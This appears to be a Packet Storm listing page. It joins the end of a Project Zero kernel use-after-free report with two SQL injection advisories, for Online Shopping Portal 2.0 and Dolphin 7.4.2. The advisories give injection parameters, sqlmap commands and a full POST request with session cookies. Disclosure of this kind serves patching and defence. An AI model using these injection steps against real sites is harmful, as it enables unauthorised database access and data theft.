 page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6  
 head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0  
 flags: 0x200000000000040(head|node=0|zone=2)  
 page_type: 0xffffefff(slab)  
 raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000  
 head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000  
 page dumped because: kasan: bad access detected

 Memory state around the buggy address:  
  ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc  
 >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
                                            ^  
  ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc  
 ==================================================================  
```

=== disclosure deadline ===  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-09-25.

For more details, see the Project Zero vulnerability disclosure policy:  
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-  
policy.html

Related CVE Numbers: CVE-2024-39486.

Found by: jannh@google.com

Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

Online Shopping Portal Project version 2.0 suffers from a remote SQL injection vulnerability.

    [x]========================================================================================================================================[x] | Title        : Online Shopping Portal Project 2.0 SQL Vulnerabilities | Software     : Online Shopping Portal Project | Create By    : https://phpgurukul.com/author/anujk305/ | Version  : V 2.0 | Last Updated  : 06 June 2024 | Download     : https://phpgurukul.com/shopping-portal-free-download/ | Date         : 03 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology  : PHP | Database  : MySQL | Price  : FREE | Description  : E-commerce means any transaction over the internet.[x]========================================================================================================================================[x][O] Exploit    http://127.0.0.1/shopping/order-details.php [email parameter]  http://127.0.0.1/shopping/order-details.php [orderid parameter]    [O] Proof of concept    create an account and order one of the items, then track your order.  sqlmap.py "YOU RAW DATA" --dbs  [SQL]  POST /shopping/order-details.php HTTP/1.1  Host: 127.0.0.1  Content-Length: 42  Cache-Control: max-age=0  sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"  sec-ch-ua-mobile: ?0  sec-ch-ua-platform: "Windows"  Accept-Language: en-US  Upgrade-Insecure-Requests: 1  Origin: http://127.0.0.1  Content-Type: application/x-www-form-urlencoded  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Sec-Fetch-Site: same-origin  Sec-Fetch-Mode: navigate  Sec-Fetch-User: ?1  Sec-Fetch-Dest: document  Referer: http://127.0.0.1/shopping/track-orders.php  Accept-Encoding: gzip, deflate, br  Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh  Connection: keep-alive  orderid=1&email=vrs_hck@maho.id&submit=    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Online Shopping Portal Project 2.0 SQL Injection

Dolphin version 7.4.2 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Blind SQL Injection - dolphinv7.4.2.# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 7.4.2# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.htmlSQL Injection:Steps to Reproduce:1. Navigate to "Builders" menu2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar3. That is the injection pointsqlmap -r request.txt --dbms=mysql -p cat[...][INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.45, Apacheback-end DBMS: MySQL >= 5.0.12[...]

Source

Packet Storm